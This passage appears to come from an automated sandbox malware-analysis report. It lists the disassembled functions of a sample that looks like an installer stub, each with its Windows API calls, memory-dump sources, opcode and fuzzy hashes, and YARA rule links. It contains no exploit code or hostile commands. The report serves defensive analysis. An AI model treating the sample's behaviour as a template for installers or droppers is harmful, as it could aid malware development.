                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                    • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                    • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                                                                                                    • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                    • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406805 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                    • CharNextW.USER32(?,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                    • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 589700163-4010320282
                                                                                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                    • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                                                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                    • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                                                                                                                    • GetMessagePos.USER32 ref: 00404EB4
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                    • String ID: f
                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                    • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                                                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                    • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                                                                    • MulDiv.KERNEL32(0005B0AC,00000064,0005B0B0), ref: 00402FE1
                                                                                                                                    • wsprintfW.USER32 ref: 00402FF1
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                                                                    Strings
                                                                                                                                    • verifying installer: %d%%, xrefs: 00402FEB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                    • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                    • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                                                                                                    • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                    • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                    • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                                                                    • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                                                                                                    • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                                                                    • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1354259210-0
                                                                                                                                    • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                    • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                                                                                                                    • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                    • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                    • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                                                                                                    • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                    • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00401E56
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                    • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                    • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                                                                                                    • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                    • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                    • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                                                                                                    • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                    • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                    • wsprintfW.USER32 ref: 00404E2D
                                                                                                                                    • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                    • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                    • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                                                                                                    • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                    • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E48
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 2659869361-3081826266
                                                                                                                                    • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                    • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                                                                                                    • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                    • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                    • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
